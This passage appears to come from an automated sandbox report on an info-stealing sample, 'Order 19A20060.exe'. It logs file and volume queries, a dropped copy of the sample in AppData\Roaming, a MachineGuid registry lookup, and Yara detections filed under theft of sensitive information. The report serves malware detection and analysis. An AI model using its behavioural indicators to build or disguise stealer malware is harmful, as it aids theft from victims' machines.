                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Users\user\Desktop\Order 19A20060.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeQueries volume information: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeQueries volume information: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.44d8f00.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.4513b20.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.4097929274.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.4097970191.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.4097970191.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Order 19A20060.exe PID: 7420, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Order 19A20060.exe PID: 7872, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: SgJzugoOJvLgL.exe PID: 1236, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.3190e28.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.289658c.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.2590e50.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.349648c.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.347842c.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.31a0e40.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.7a40000.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.SgJzugoOJvLgL.exe.25a0e5c.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.31a0e40.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Order 19A20060.exe.4169970.10.unpack, type: UNPACKEDPE
